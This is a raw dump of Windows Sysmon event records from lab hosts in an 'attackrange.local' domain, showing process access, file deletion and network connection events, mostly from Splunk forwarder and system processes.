07:52:09.984{466BC892-32D3-60E8-770B-00000000CF01}63565620C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x80000000000000001048873Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:09.632{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F4A9-60EB-337D-00000000CF01}8756C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048872Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:09.632{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F4A9-60EB-337D-00000000CF01}8756C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048871Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:09.616{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4A9-60EB-337D-00000000CF01}8756C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048870Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:09.616{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F4A9-60EB-337D-00000000CF01}8756C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048869Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:09.616{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F4A9-60EB-337D-00000000CF01}8756C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048868Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:09.616{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-F4A9-60EB-337D-00000000CF01}8756C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+36349|c:\windows\system32\rpcss.dll+3bb32|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048867Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:09.115{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED5B443631E50E71972313AB189CB67E,SHA256=43372EC646A8D7C2280294D55D16B7461C448E984BB0CF2C2D7683118C99C796,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807522Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:10.541{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44076A82EC2B2A7683E2C6E0CE040979,SHA256=E3089C869D5A1AD4608C00791B394599CDB6DF99983F860C3D307D49AA8EA472,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048881Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:10.631{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048880Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:10.600{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=09BA4ED778BC7F512BD93175B4B8D69F,SHA256=2EC75809DF32B07AFC0102CB881CBF325E3128ED9F0CD2F4ABE0B533D6DAFCFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048879Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:10.600{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5908B71AD457D4F41DA91769D0ECAB10,SHA256=A1DC0C1BE426B632ADA234FBF36D4ED891A9E38229F8A8FD1819BC7AD443CAD9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048878Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:10.453{466BC892-32D3-60E8-770B-00000000CF01}63565620C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\ole32.dll+8a26e|C:\Windows\System32\ole32.dll+89b6b|C:\Windows\System32\ole32.dll+88d27|C:\Windows\System32\ole32.dll+8c957|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9 10341000x80000000000000001048877Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:10.453{466BC892-32D3-60E8-770B-00000000CF01}63565620C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\ole32.dll+b5f62|C:\Windows\System32\ole32.dll+89b39|C:\Windows\System32\ole32.dll+88d27|C:\Windows\System32\ole32.dll+8c957|C:\Windows\System32\SHELL32.dll+2c8c3d|C:\Windows\System32\SHELL32.dll+28385e|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9 23542300x80000000000000001048876Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:10.116{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8E4AF6AF59B5228E63E9873E77AE3C2,SHA256=C137FE1305138A93D8F6D7755D4A39CA1AF38F7B7A825038D087580E2DB13953,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807521Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:09.221{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57263-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807523Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:11.573{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF06C9D4A3864A2719ED9F7EA2BDA294,SHA256=64AE46F8E6E8359C54D3B091729413AE55A28BC41538D5DA487811E52E2276EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048883Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:11.131{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=291088AB30D833DE1085169132CBFFE7,SHA256=229183F40439E3B87B2C6402F9581ABE3DDB5A7257E2ECE660176A214AEE8047,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048882Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:02.744{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51021-false10.0.1.12-8000- 23542300x8000000000000000807524Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:12.635{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=668E2AFB4B17F812939F401F6490A95F,SHA256=7A64702F502281D06565CC4A8AC1B5AC19E2F735658007FA89FFAE43F36CB3CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048884Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:12.148{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF94EA8DDFF98EDE386F3F5138AFABC4,SHA256=D0F597FBB75082BEE018F6D2B314172CD2BA5765C5402DEA400CB491A0852058,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807525Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:13.682{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=038868AC652154A48765E66E0EDCF454,SHA256=1AD4ABD3D62B79C0D063DBC96052F2098E1EEF83E66887694E211C66AFED495F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048885Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:13.151{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A47857442B865F83FDD143AEEF8BF692,SHA256=C10A87AA17E0703A2A8F4C64595F54BF77EFD7E22D4C63091AE7F37EC9667EEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807526Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:14.725{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C99F6FB76DE4659B6147104AE717B37,SHA256=B0C7F15C3F03B57A21EC3454C455B1572E1CD3F027BCEDA3C78F85804C6AEC31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048887Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:14.412{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=09BA4ED778BC7F512BD93175B4B8D69F,SHA256=2EC75809DF32B07AFC0102CB881CBF325E3128ED9F0CD2F4ABE0B533D6DAFCFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048886Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:14.181{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BDC6AA381BE2555168E4F2D0FB451BF,SHA256=A4B1FF938FC2A5F0186620E1D03B1FF5FEF4BAFCA9754E56EFFA6D11B88E1889,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807528Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:15.757{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCD90EAA6C1D5720F9B07C66DB846FE5,SHA256=42F2B36B31F491241498E2D9896957B481B018D6F1C4D168DED935619BC2133D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048889Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:06.307{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-63329-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001048888Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:15.212{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B2FF5ECC8CCF5EA8467F39FDE7B2513,SHA256=D78954E5002A61BE8248B77F603340E7F8184B08139529304789774D40438699,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807527Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:14.389{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57264-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807529Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:16.788{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE2EB4AD65BFB7CDB5B23D1EC1B1E90F,SHA256=EC5896610DB9959334B7E880E77D5DDB2D35D2D98B4BCD30FA633433CD47035E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048891Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:16.828{466BC892-32D3-60E8-770B-00000000CF01}63565956C:\Windows\Explorer.EXE{466BC892-F49A-60EB-317D-00000000CF01}9572C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048890Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:16.213{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C522021892420DF27FA6D91F6F9CAC4C,SHA256=DA9EF58F524166AFECFF8B68C0F67CEB7619CAEBE756411C635D14E90BD062F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807530Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:17.819{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2143DC81A311B2148619F88A46867A5E,SHA256=2ADE837B3AF8EFC44B7BA0B584CFF50556E159AEC4D325C4583A7EE12BC17E74,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048895Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:08.708{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51023-false10.0.1.12-8000- 354300x80000000000000001048894Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:07.940{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51022-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001048893Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:07.940{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51022-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001048892Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:17.246{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37F692CDCBD3E7263D3002D15A0C682E,SHA256=DD525359D3C33808F237DA323AE7AE3F1064D7005502B5ECD6A959054C38F957,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807531Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:18.866{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4517A2A114A1C7558EF76755796FBEF,SHA256=6C9CA8149F9D12A49D0C6DB723B2F50A142803C30D8FA1FD5A51199BC8D9F15D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048897Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:18.279{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37CECDAB519D823E9BA8023EC2ACF55E,SHA256=3844AEE61E46ED8FDFAB24C850708869794054BAAA604AD1023BB79365D8B33A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048896Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:18.279{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807532Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:19.866{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52A4A84BE68E455BCD8D090B833ED804,SHA256=269F4BD44970C75D5B57C69A5FD6D57D93F60C7AE31381F2D829F2473D58400E,IMPHASH=00000000000000000000000000000000falsetrue 